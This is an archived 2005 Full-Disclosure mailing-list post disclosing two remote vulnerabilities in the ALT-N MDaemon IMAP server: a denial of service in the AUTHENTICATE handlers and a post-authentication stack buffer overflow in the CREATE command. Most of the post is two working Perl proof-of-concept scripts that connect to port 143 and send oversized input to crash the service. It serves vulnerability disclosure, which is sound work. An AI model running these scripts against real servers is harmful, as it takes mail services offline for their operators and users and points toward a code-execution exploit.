[Full-disclosure] ALT-N MDaemon multiple vulnerabilities

From: kcope (kingcope_at_gmx.net)
Date: 07/18/05

  • Next message: David Wilde: "[Full-disclosure] Advice RE Site Exploit"
    Date: Mon, 18 Jul 2005 20:24:09 +0200
    To: full-disclosure@lists.grok.org.uk
    
    

    Hello this is kcope,

    there are two remote vulnerabilities in the latest ALT-N MDaemon imapd
    product
    i don't know if any of them is exploitable .. the stack based buffer
    overflow
    seems promising, but it's not preauth so i didn't investigate it further.

    1.) Remote denial of service in AUTHENTICATE LOGIN and AUTHENTICATE CRAM-MD5
    2.) Remote stack based buffer overflow after authentication in the imap
    CREATE statement

    ---snip---
    ###
    ### MDAEMON remote DoS exploit by kcope
    ### looks like theres a fault in the base64 decoder
    ### works also for AUTHENTICATE LOGIN
    ###

    use IO::Socket::INET;

    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                  PeerPort => '143',
                                  Proto => 'tcp');

    $a = "q" x 1000;

    print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
    print $sock $a,"\r\n";
    print $sock $a,"\r\n";

    while (<$sock>) {
        print $_;
    }
    ---snip---

    ---snip---
    ### MDAEMON stack based buffer overflow
    ### Remote DoS exploit by kcope
    use IO::Socket::INET;
    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                  PeerPort => '143',
                                  Proto => 'tcp');

    $a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;

    print $sock "a001 LOGIN username password\r\n";
    print $sock "a001 CREATE $a\r\n";

    while (<$sock>) {
        print $_;
    }
    ---snip---

    -kcope

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: David Wilde: "[Full-disclosure] Advice RE Site Exploit"

    Relevant Pages